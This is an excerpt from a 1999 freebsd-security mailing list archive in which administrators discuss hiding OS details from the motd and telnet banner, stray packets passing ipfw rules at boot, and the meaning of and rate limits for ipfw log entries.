owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Another way to prevent users from seeing what type of OS you are running is by changing the following line in inetd.conf: telnet stream tcp nowait root /usr/libexec/telnetd telnetd -h what you are doing is adding the -h at the end of the line which prevents a user from seeing the OS before even logging in. Jeremy Ramirez At 12:27 PM 09/11/1999 +0100, you wrote: >Hi > >Please would somebody tell me how to prevent motd including the OS version >and the kernel name. On my 3.2 box editing the lines out of /etc/motd just >leads to them being replaced > >Patrick Mackeown > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message >>Set update_motd="NO" in rc.conf, and it will be left alone. >>-- >>Ben Smithurst | PGP: 0x99392F7D >>ben@scientia.demon.co.uk | key available from keyservers and >>| ben+pgp@scientia.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 14:15:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail-gw.pacbell.net (mail-gw.pacbell.net [206.13.28.25]) by hub.freebsd.org (Postfix) with ESMTP id 1FD301540B for ; Sat, 11 Sep 1999 14:15:49 -0700 (PDT) (envelope-from madscientist@thegrid.net) Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net [63.193.246.169]) by mail-gw.pacbell.net (8.9.3/8.9.3) with SMTP id OAA09337 for ; Sat, 11 Sep 1999 14:15:48 -0700 (PDT) Message-Id: <4.1.19990911141414.009a3dd0@mail.thegrid.net> X-Sender: i289861@mail.thegrid.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sat, 11 Sep 1999 14:14:52 -0700 To: freebsd-security@freebsd.org From: The Mad Scientist Subject: Re: ipfw passing packets past deny rule? In-Reply-To: <19990911112634.A15026@montezuma.acc.umu.se> References: <4.1.19990911010348.00988480@mail.thegrid.net> <4.1.19990911010348.00988480@mail.thegrid.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes, of course. Thanks to all those that replied. -Dean At 11:26 AM 9/11/99 +0200, you wrote: > >That packet might have slipped through before your bootup scripts had a >chance to run /etc/rc.firewall, or during the execution of >/etc/rc.firewall.. (before loading rule 10000).. > >Basically nothing to worry about. > >Markus > >-- > >Markus Holmberg | Give me UNIX or give me a typewriter. >saska@acc.umu.se | http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 18:43:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 54B84150CB; Sat, 11 Sep 1999 18:43:30 -0700 (PDT) (envelope-from ben@scientia.demon.co.uk) Received: from lithium.scientia.demon.co.uk ([192.168.0.3] ident=exim) by scientia.demon.co.uk with esmtp (Exim 3.032 #1) id 11PxSQ-000ErQ-00; Sun, 12 Sep 1999 01:25:26 +0100 Received: (from ben) by lithium.scientia.demon.co.uk (Exim 3.032 #1) id 11PxSO-000AsW-00; Sun, 12 Sep 1999 01:25:24 +0100 Date: Sun, 12 Sep 1999 01:25:24 +0100 From: Ben Smithurst To: "Jeremy L. Ramirez" Cc: dev-null@ns1.digicomsystems.net, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: How to prevent motd including os info Message-ID: <19990912012524.B41509@lithium.scientia.demon.co.uk> References: <4.2.0.58.19990911151659.00aa8d60@ns1.digicomsystems.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.6i In-Reply-To: <4.2.0.58.19990911151659.00aa8d60@ns1.digicomsystems.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jeremy L. Ramirez wrote: > telnet stream tcp nowait root /usr/libexec/telnetd telnetd -h > > what you are doing is adding the -h at the end of the line which prevents > a user from seeing the OS before even logging in. An even better way is to disable telnet completely, and use ssh like you should. Note that people can still use nmap or something to guess at your OS. -- Ben Smithurst | PGP: 0x99392F7D ben@scientia.demon.co.uk | key available from keyservers and | ben+pgp@scientia.demon.co.uk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 20:44:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from entic.net (shell.entic.net [209.157.122.66]) by hub.freebsd.org (Postfix) with SMTP id 2E1CA14D69 for ; Sat, 11 Sep 1999 20:44:41 -0700 (PDT) (envelope-from aj@entic.net) Received: (qmail 9012 invoked by uid 1000); 12 Sep 1999 03:43:11 -0000 Date: Sat, 11 Sep 1999 20:43:11 -0700 (PDT) From: Anil Jangity To: freebsd-security@freebsd.org Subject: ipfw question In-Reply-To: <37D9704C.CE395DC4@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am using FreeBSD2.2.8 Stable with IPFW enalbed with logging. ipfw: 2600 Deny P:54 204.210.42.217 209.157.122.88 in via ep0 What does the "P:54" mean? Just wondering. -- Also does anyone know if IP Filters (or ipfw) let you limit logging depending on the rate at which the rule is applied? If I don't have a limit, my server panicked before because of an overload of denied packets (while logging was enabled) so I now have a limit of 150 packets that get logged. I want to be able to log at the same time also not over log (not get it to run out of buffer and panic). I need to stop logging if and only if the rate at which they rules are getting applied passes a certain point and then continue again once the rate drecreases. Is this doable? Do I make sense any bit? Is this stupid? Thanks. Kind regards, Anil Jangity aj@entic.net "Work like you don't need money, love like you've never been hurt, and dance like no one's watching." by Lisa Wille? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 11 21: 9:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id D8FE814D8B for ; Sat, 11 Sep 1999 21:09:12 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id VAA30134; Sat, 11 Sep 1999 21:07:50 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909120407.VAA30134@gndrsh.dnsmgr.net> Subject: Re: ipfw question In-Reply-To: from Anil Jangity at "Sep 11, 1999 08:43:11 pm" To: aj@entic.net (Anil Jangity) Date: Sat, 11 Sep 1999 21:07:50 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I am using FreeBSD2.2.8 Stable with IPFW enalbed with logging. > > ipfw: 2600 Deny P:54 204.210.42.217 209.157.122.88 in via ep0 > > What does the "P:54" mean? Just wondering. Protocol 54, I would say see /etc/protocols, but it depends on how new your code is, anyway here is what IANA says about it: 54 NARP NBMA Address Resolution Protocol [RFC1735] > > -- > > Also does anyone know if IP Filters (or ipfw) let you limit logging > depending on the rate at which the rule is applied? Not that I am aware of, now would someone please code this up so I can be wrong :-) > > If I don't have a limit, my server panicked before because of an overload > of denied packets (while logging was enabled) so I now have a limit of 150 > packets that get logged. I want to be able to log at the same time also > not over log (not get it to run out of buffer and panic). > > I need to stop logging if and only if the rate at which they rules are > getting applied passes a certain point and then continue again once the > rate drecreases. > > Is this doable? Do I make sense any bit? Is this stupid? Thanks. Yes. Yes. No. Your welcome for the little help I could be. -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message